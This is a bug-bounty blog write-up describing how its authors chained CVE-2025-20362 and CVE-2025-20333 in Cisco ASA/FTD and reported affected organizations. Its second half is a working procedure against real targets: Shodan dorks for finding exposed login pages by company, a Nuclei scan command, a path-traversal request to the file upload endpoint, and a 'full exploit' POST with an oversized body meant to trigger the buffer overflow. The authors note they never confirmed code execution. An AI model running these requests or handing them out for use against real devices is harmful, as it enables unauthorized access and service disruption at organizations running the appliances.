From Medium to Critical: Chaining CVE-2025–20362 & CVE-2025–20333 in Cisco ASA/FTD Across 20+…

السلام عليكم ورحمة الله وبركاته

What if a medium-severity vulnerability was the key to reaching a critical 9.9 vulnerability?

We are 0xDyad (OFFA & George). During our research into CVE-2025–20362 (CVSS 6.5) in Cisco ASA/FTD, we discovered that it could be chained with CVE-2025–20333 (CVSS 9.9), a classic buffer overflow vulnerability, to create a powerful attack chain.

With no public PoC, exploit, or technical write-up available, we developed our own methodology and successfully identified vulnerable deployments across 20+ global organizations, including Meta, Ferrari, and the U.S. Department of Defense — earning us DoD Researcher of the Month recognition.

In this write-up, we'll share the technical details and exploitation methodology behind our findings..

So, grab your favorite drink and enjoy the read!

The Introduction

Our research began with a focused investigation into CVE-2025–20362, a missing authorization vulnerability (CWE-862) affecting Cisco Secure ASA and Cisco Secure FTD Software. Initially rated with a CVSS score of 6.5 (Medium), this vulnerability allows unauthenticated remote attackers to access restricted URL endpoints that are intended to be protected by authentication mechanisms.

While analyzing this vulnerability, we examined the Cisco security advisory and discovered a critical detail in the vulnerability chain: CVE-2025–20362 could be leveraged to reach and expose internal endpoints that are otherwise inaccessible without proper authentication. More importantly, we recognized that these exposed endpoints could be exploited to trigger a second, far more severe vulnerability: CVE-2025–20333.

CVE-2025–20333 is a classic buffer overflow vulnerability (CWE-120) in the same web service, rated CVSS 9.9 (Critical). However, a crucial barrier existed — without first successfully exploiting CVE-2025–20362 to bypass authentication and expose the vulnerable endpoint, CVE-2025–20333 would remain unreachable in real-world deployments.

This realization sparked our investigation: if we could develop a working exploit for this vulnerability chain, we might be able to demonstrate a complete attack scenario affecting vulnerable organizations worldwide.

The Hunt for the Exploit

That realization sparked our journey to find a working exploit. Our first step was scouring all the known repositories, forums, and security tools, looking for any public information on how to exploit these two CVEs together. We found absolutely nothing. The only resource available was a basic Nuclei template for CVE-2025–20362. It merely demonstrated unauthorized access to certain endpoints. In a real-world bug bounty context, submitting this alone almost always results in an "Informative" or "Low" severity triage, simply because there was no demonstrable impact or meaningful exploitation tied to that exposure. We then shifted our focus to the 9.9 Critical vulnerability, CVE-2025–20333. Surprisingly, there were no public Proof of Concepts (PoCs) or detailed technical write-ups explaining how to trigger it. The only mentions we found were vague news articles and high-level security advisories from when the CVE was initially announced. The actual exploitation mechanics were completely shrouded in mystery. Realizing we were in uncharted territory, We teammate and I decided to take matters into our own hands. We needed to study the vulnerability deeply and figure out how to chain it with the initial CVE. Knowing that the critical CVE was a Classic Buffer Overflow, we started brainstorming how to construct a reliable exploit. We spent hours theorizing, crafting payloads, and testing numerous scenarios in our lab. At first, every single attempt failed. But we knew we were on the edge of something big.

As our research progressed, we discovered that both vulnerabilities could be combined into a practical attack chain. While we were not able to fully confirm the final path to Remote Code Execution (RCE), our analysis indicated that the chain could potentially provide a route toward RCE, significantly increasing the overall security impact beyond what either vulnerability would suggest when viewed in isolation.

This realization became the driving force behind our investigation. If we could successfully demonstrate and validate this attack chain, we would be able to show how two independently reported vulnerabilities could be transformed into a far more serious real-world threat affecting organizations worldwide.

The Breakthrough: Triggering the Buffer Overflow

Through relentless testing and analysis, we theorized that the Buffer Overflow condition was directly tied to how the server handled the Content-Length header. This led us to a new, promising hypothesis.

We decided to experiment with HTTP method manipulation. We changed the request method from GET to POST and pointed it directly at one of the sensitive endpoints we had successfully exposed using the unauthorized access from the first vulnerability (CVE-2025-20362).

The target endpoint looked like this:

HTTP
GET /.../?mode=upload&path=overflow_test&server=localhost&sourceurl=payload HTTP/1.1

HTTP
GET /.../?mode=upload&path=overflow_test&server=localhost&sourceurl=payload HTTP/1.1

Discovery Methodology

At this stage, we moved on to identifying affected companies. Fortunately, the process was relatively straightforward. Any company vulnerable to the first CVE was, in most cases, also vulnerable to the second CVE.

I will now describe the Proof of Concept (PoC), as well as the methodology used to identify and verify affected targets.

The first step is to search for exposed instances using Shodan or any other search engine capable of indexing internet-facing services. The following dork can be used to identify potentially affected endpoints:

html:"/+CSCOE+/logon.html"

html:"/+CSCOE+/logon.html"

To search for a specific company, the following query can be used:

html:"/+CSCOE+/logon.html" ssl:"company name"

html:"/+CSCOE+/logon.html" ssl:"company name"

After identifying relevant results, collect and save the IP addresses associated with the target organization.

Verification Process

Next, download the Nuclei template for CVE-2025–20362 and execute it against the identified targets:

nuclei -u <target-ip> -t CVE-2025-20362.yaml

nuclei -u <target-ip> -t CVE-2025-20362.yaml

Once the target is confirmed to be affected, intercept the request associated with the endpoint identified by the Nuclei scan using Burp Suite.

Request:

POST /+CSCOU+//../+CSCOE+/files/file_action.html?mode=upload&path=foo&server=srv&sourceurl=qaz HTTP/1.1
Host: ip
Content-Type: application/x-www-form-urlencoded;boundary=ee
Content-Length: 8

aabbccdd

POST /+CSCOU+//../+CSCOE+/files/file_action.html?mode=upload&path=foo&server=srv&sourceurl=qaz HTTP/1.1
Host: ip
Content-Type: application/x-www-form-urlencoded;boundary=ee
Content-Length: 8

aabbccdd

Response:

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
X-Frame-Options: SAMEORIGIN
Content-Length: 135

<html><body><script>alert('Failed to upload file');
location.href="/+CSCOE+/files/browse.html?code=init&path=qaz"
</script></body></html>

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
X-Frame-Options: SAMEORIGIN
Content-Length: 135

<html><body><script>alert('Failed to upload file');
location.href="/+CSCOE+/files/browse.html?code=init&path=qaz"
</script></body></html>

Modify the request method from GET to POST, then send a request containing a large payload within the request body. If the server response is significantly delayed, this indicates that the vulnerability is likely present and exploitable.

so full exploit like this :

POST /+CSCOU+//../+CSCOE+/files/file_action.html?mode=upload&path=overflow_test&server=localhost&sourceurl=payload HTTP/1.1
Host: ip/host
Content-Type: application/x-www-form-urlencoded
Content-Length: 719696

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...[719696 bytes of 'A']

POST /+CSCOU+//../+CSCOE+/files/file_action.html?mode=upload&path=overflow_test&server=localhost&sourceurl=payload HTTP/1.1
Host: ip/host
Content-Type: application/x-www-form-urlencoded
Content-Length: 719696

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...[719696 bytes of 'A']

At this point, the issue can be responsibly disclosed to the affected organization for remediation.

This video provides a detailed explanation of how the exploitation chain works. Feel free to watch it and share your thoughts in the comments :).

https://youtu.be/pbbP6NA0DqE?si=Qz3mqY7dY-_uP9U3

These are some of our submitted reports across different companies, including Meta, Ferrari, and several other organizations on HackerOne. All reports are based on the same vulnerability and exploitation scenario, and all of them have been successfully triaged.

It has also been submitted to the DoD (Department of Defense) vulnerability disclosure program, where it received recognition and we were awarded "Researcher of the Month" for our findings.